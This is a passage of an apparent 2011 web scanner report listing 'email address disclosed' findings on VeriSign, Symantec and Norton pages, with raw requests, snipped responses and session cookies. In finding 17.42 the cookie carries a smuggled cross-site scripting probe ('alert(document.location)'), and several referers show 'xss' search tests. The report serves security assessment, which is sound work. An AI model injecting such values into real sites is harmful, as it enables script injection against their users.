Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Responsys Privacy Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>

...[SNIP]...
<a href="mailto:privacy@responsys.com">privacy@responsys.com</a>
...[SNIP]...
<a href="mailto:privacy@responsys.com">privacy@responsys.com</a>
...[SNIP]...

17.35. https://press.verisign.com/easyir/customrel.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /easyir/customrel.do

Issue detail

The following email address was disclosed in the response:

Request

GET /easyir/customrel.do HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1286
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <!-- so that relative references will use absolute url from jsp
                   and not from calling
...[SNIP]...
<b>support@marketwire.com</b>
...[SNIP]...

17.36. http://query.verisign.ch/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.37. http://query.verisign.com/cluster.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /cluster.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cluster.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 8783
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com


/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:
*
* - User initiates search query and wants clustered results
*
* - Res
...[SNIP]...
* Tested under:
* Firefox 1.5.0.7 (Linux)
* Firefox 1.5.0.7 (WinXP)
* Firefox 1.5.0.4 (Mac OS X 10.4.7)
*
* IE 6.0... (WinXP SP2)
*
* Safari (Mac OS X 10.4.7)
*
* @author dspencer@google.com
*
* @requires common.js
* @requires xmlthtp.js
* @requires uri.js
*/


/**
* Name of conceptual clustering servlet in
* servlet array in JSON dictionary.
*/
var CS_CONCEPTS_NAME = 'Concepts';

...[SNIP]...

17.38. http://query.verisign.com/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 56081
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

17.39. http://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:07 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 52678


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.40. http://query.verisign.com/uri.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /uri.js

Issue detail

The following email address was disclosed in the response:

Request

GET /uri.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 17596
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

17.41. https://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.42. https://renewals.symantec.com/renewals/chat_form.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/chat_form.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /renewals/chat_form.jsp HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:39:05 GMT
Content-Type: text/html
Content-Length: 15726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- BEGIN IMPORT_INCLUDE-->


<!--END IMPORT_INCLUDE-->


<html>
<head><ti
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...
<a href="mailto:sales@symantecsmbrenewals.com">
...[SNIP]...

17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/symantec_omniture/s_code_20100217.js

Issue detail

The following email address was disclosed in the response:

Request

GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:37 GMT
Content-Length: 30123
Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

/* Rainmaker changes to set the report suite. */
if (location.href.inde
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

17.44. http://us.norton.com/beta/overview.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /beta/overview.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39170

<meta http-equiv="refresh" content="0;url=http://us.norton.com/beta">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Beta Software - Norton 360 Version
...[SNIP]...
<a href="mailto:betafeedback@symantec.com">betafeedback@symantec.com</a>
...[SNIP]...

17.45. http://us.norton.com/familyresources/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /familyresources/index.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /familyresources/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=64
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67586

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Family Resource Center: Internet Safety for Children, Teens &amp;amp; Adults
...[SNIP]...
<a href="mailto:marian@norton.com">
...[SNIP]...
<a href="mailto:advertising@norton.com">
...[SNIP]...

17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /scripts/colorbox/norton/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/colorbox/norton/jquery.colorbox-min.js HTTP/1.1
Host: us.norton.com
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNORTDC=0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 09 Feb 2011 19:22:17 GMT
ETag: "23e8-4d52e969"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 9192
Cache-Control: public, max-age=2112
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...

17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmanager.verisign.com
Path:   /vipmgr/createtrialaccount.v

Issue detail

The following email address was disclosed in the response:

Request

GET /vipmgr/createtrialaccount.v HTTP/1.1
Host: vipmanager.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<head>

<META http-equiv="Content-Type" content="te
...[SNIP]...
<a href="mailto:viptrial-support@verisign.com">viptrial-support@verisign.com</a>
...[SNIP]...

17.48. http://vipmobile.verisign.com/home.v

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vipmobile.verisign.com
Path:   /home.v

Issue detail

The following email address was disclosed in the response:

Request

GET /home.v HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:50 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Content-Length: 16260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...

17.49. https://vipmobile.verisign.com/home.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /home.v

Issue detail

The following email address was disclosed in the response:

Request

GET /home.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:06 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 16260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...

17.50. https://vipmobile.verisign.com/supportedphones.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /supportedphones.v

Issue detail

The following email address was disclosed in the response:

Request

GET /supportedphones.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:46 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 1508897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...
<a name="header-email" target="_top" href="mailto:vipmobile@verisign.com">
...[SNIP]...
<a href="mailto:vipmobile@verisign.com" style="white-space:nowrap;">vipmobile@verisign.com</a>
...[SNIP]...

17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /about/profile/policies/privacy.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /about/profile/policies/privacy.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1721
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Complete Privacy Policy - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="mailto:privacy@symantec.com">privacy@symantec.com</a>
...[SNIP]...
<a href="mailto:privacy@symantec.com">privacy@symantec.com</a>
...[SNIP]...

17.52. http://www.symantec.com/business/theme.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/theme.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 51820
Cache-Control: public, max-age=1145
Date: Fri, 09 Sep 2011 21:26:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti
...[SNIP]...
<a href="mailto:verisales@verisign.com">verisales@verisign.com</a>
...[SNIP]...
<a href="mailto:renewals-team@verisign.com">renewals-team@verisign.com</a>
...[SNIP]...
<a href="mailto:channel-partners@verisign.com">channel-partners@verisign.com</a>
...[SNIP]...
<a href="mailto:eca-support@verisign.com">eca-support@verisign.com</a>
...[SNIP]...
<a href="mailto:eca-authentication@verisign.com">eca-authentication@verisign.com</a>
...[SNIP]...
<a href="mailto:eca-sales@verisign.com">eca-sales@verisign.com</a>
...[SNIP]...
<a href="mailto:billing@verisign.com">billing@verisign.com</a>
...[SNIP]...

17.53. http://www.symantec.com/connect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
